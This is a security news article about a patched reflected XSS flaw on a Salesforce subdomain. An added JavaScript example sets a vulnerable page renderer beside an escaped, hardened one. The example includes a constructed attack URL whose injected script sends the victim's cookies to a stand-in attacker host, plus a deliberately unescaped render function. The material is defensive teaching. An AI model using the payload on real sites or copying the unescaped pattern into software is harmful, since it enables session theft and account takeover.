Salesforce Patches Dangerous XSS Flaw

Salesforce.com has patched a cross-site scripting (XSS) flaw in one of its subdomains that could have been exploited by attackers to hijack accounts or distribute malware.
“This subdomain was vulnerable to a reflected Cross-site Scripting (XSS) vulnerability where a specific function in the deployed application failed to sanitize and filter the arbitrary input passed by the remote user as a part of an HTTP request. As a result, the attacker could have executed JavaScript in the context of the application, thereby impacting the privacy and security of Salesforce users.”

There are three main ways that the flaw could be exploited, according to the firm.

The first could allow account takeover: an attacker executes JavaScript in the victim's browser to steal cookies and session identifiers.

Another involves the attacker redirecting Salesforce users to phishing sites, or injecting pop-up windows designed for the same purpose.

Finally, an attacker could use the XSS flaw to push malicious code onto users' machines by “executing unauthorized scripts in the context of the browser running a vulnerable application.”
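The following JavaScript is an added example, not Salesforce's code and not the researchers' proof of concept. It shows the pattern the quoted description refers to: a handler that reflects a request parameter into the page without escaping it, the same handler hardened with output encoding, and the cookie and CSP headers that blunt the session-theft vector even when an escape is missed. The search page, the `q` parameter, the `sid` cookie name and the attacker host are assumptions for illustration.

```javascript
// Added example of reflected XSS: vulnerable render beside a hardened one.
// Hypothetical application code, not Salesforce's. The "q" parameter, page
// shape, cookie name and attacker host are assumptions for illustration.

// Minimal HTML escaping for text placed into an element body or a quoted attribute.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')   // must run first so later entities are not double-escaped
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// VULNERABLE: the search term from the request is written straight into the page,
// so any markup the remote user supplies becomes live HTML in the victim's browser.
function renderSearchVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// HARDENED: same page, but the attacker-controlled value is escaped before output.
function renderSearchHardened(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// Parse the query string of an incoming request path the way the handler would.
// The base origin is only needed so the URL parser accepts a relative path.
function extractQuery(requestPath) {
  const url = new URL(requestPath, 'https://example.invalid');
  return url.searchParams.get('q') ?? '';
}

// Defence in depth for the account-takeover vector: HttpOnly keeps document.cookie
// from exposing the session id to injected script, and the CSP blocks inline script.
function hardenedHeaders(sessionId) {
  return {
    'Set-Cookie': `sid=${sessionId}; Path=/; Secure; HttpOnly; SameSite=Lax`,
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'",
    'Content-Type': 'text/html; charset=utf-8',
  };
}

// Rough check used by the demo: does the rendered HTML still contain a live script tag?
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker link (not a real payload from the advisory): the reflected
// script tries to send the victim's cookies to an attacker-controlled host.
const ATTACK_PATH =
  '/search?q=%3Cscript%3Efetch(%22https://attacker.invalid/c?%22%2Bdocument.cookie)%3C/script%3E';

// Run the constructed request through both renderers and report whether the
// injected script survives into the page.
function demo() {
  const q = extractQuery(ATTACK_PATH);
  return {
    vulnerableExecutes: containsLiveScript(renderSearchVulnerable(q)),
    hardenedExecutes: containsLiveScript(renderSearchHardened(q)),
  };
}
```

Output encoding at the point of insertion is the fix that closes all three vectors the article lists; the `HttpOnly` flag and the CSP only reduce the blast radius of the cookie-theft case, and do nothing against a script that redirects the victim to a phishing page or triggers a download.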
